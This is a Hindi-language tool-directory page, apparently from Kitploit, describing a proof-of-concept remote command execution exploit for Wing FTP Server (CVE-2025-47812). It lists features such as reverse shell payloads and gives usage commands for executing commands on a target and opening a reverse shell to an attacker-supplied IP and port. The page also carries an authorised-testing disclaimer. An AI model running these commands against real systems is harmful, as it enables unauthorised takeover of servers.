Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WingFTP-CVE-2025-47812-illdeed — विंग FTP सर्वर (CVE-2025-47812) के लिए रिमोट कमांड निष्पादन एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

विंग FTP सर्वर (CVE-2025-47812) के लिए रिमोट कमांड निष्पादन एक्सप्लॉइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-47812 - Wing FTP Server RCE एक्सप्लॉइट

यह रिपॉज़िटरी CVE-2025-47812 के लिए एक proof-of-concept एक्सप्लॉइट प्रदान करती है, जो Wing FTP Server में एक रिमोट कमांड एक्ज़ीक्यूशन (RCE) भेद्यता है। एक हमलावर प्रमाणीकरण के दौरान username पैरामीटर का दुरुपयोग करके मनमाना Lua-आधारित सिस्टम कमांड इंजेक्ट और निष्पादित कर सकता है, जिसके परिणामस्वरूप पूर्ण रिमोट कोड एक्ज़ीक्यूशन होता है।


📌 एक्सप्लॉइट विशेषताएँ

  • 🔧 कस्टम शेल कमांड का रिमोट निष्पादन
  • 🧬 कई अंतर्निहित रिवर्स शेल पेलोड (bash, Python, netcat, आदि)
  • 🪪 Set-Cookie से स्वचालित UID निष्कर्षण
  • 📦 सफल UID को found_uids.txt में लॉग करता है
  • 🧪 ड्राई-रन मोड (कोई वास्तविक अनुरोध नहीं भेजा जाता — अपने इनपुट/आउटपुट लॉजिक का सुरक्षित रूप से परीक्षण करें)
  • 🔁 नेटवर्क विफलता पर रीट्राई लॉजिक
  • 🧹 साफ-सुथरा पेलोड फ़ॉर्मेटिंग और पठनीय आउटपुट
  • ✅ IP, पोर्ट और URL के लिए इनपुट सत्यापन
  • ⚙️ स्वचालित वर्कफ़्लो के लिए कमांड-लाइन आर्गुमेंट समर्थन

💻 उपयोग

एक साधारण शेल कमांड निष्पादित करें:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

रिवर्स शेल ट्रिगर करें:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

ड्राई-रन मोड (कोई अनुरोध नहीं भेजा जाएगा):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 मूल एक्सप्लॉइट में किए गए बदलाव


⚠️ अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
इस टूल का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।



टूल डाउनलोड करें
Feature/ImprovementDescription
✅ आर्गुमेंट पार्सिंगगैर-इंटरैक्टिव मोड के लिए argparse CLI समर्थन जोड़ा गया
🔐 इनपुट सत्यापनएक्सप्लॉइट प्रयास से पहले मान्य URL/IP/पोर्ट सुनिश्चित करता है
📦 हेडर रीफ़ैक्टरिंगस्थिरता के लिए HTTP हेडर को पुन: प्रयोज्य फ़ंक्शन में निकाला गया
📄 UID लॉगिंगसफल UID टोकन को found_uids.txt में सहेजता है
🧪 ड्राई-रन मोडअनुरोध भेजे बिना सुरक्षित परीक्षण की अनुमति देता है (--dry-run)
🕒 टाइमआउट + रीट्राईअनुरोध टाइमआउट और विफलता पर स्वचालित रीट्राई प्रयास जोड़ता है
🧼 पेलोड पठनीयतास्पष्टता और रखरखाव के लिए Lua इंजेक्शन स्ट्रिंग को पुनः प्रारूपित किया गया
📊 संरचित आउटपुटआसान पढ़ने के लिए सर्वर प्रतिक्रियाओं और पेलोड जानकारी को डिलीमीटर के साथ लपेटा गया
⚠️ स्टेटस कोड जाँचलक्ष्य अप्रत्याशित HTTP स्टेटस कोड लौटाता है तो उपयोगकर्ता को चेतावनी देता है
📝 लॉगिंग सिस्टमबेहतर वर्बोसिटी नियंत्रण के लिए print() को Python logging मॉड्यूल से बदलता है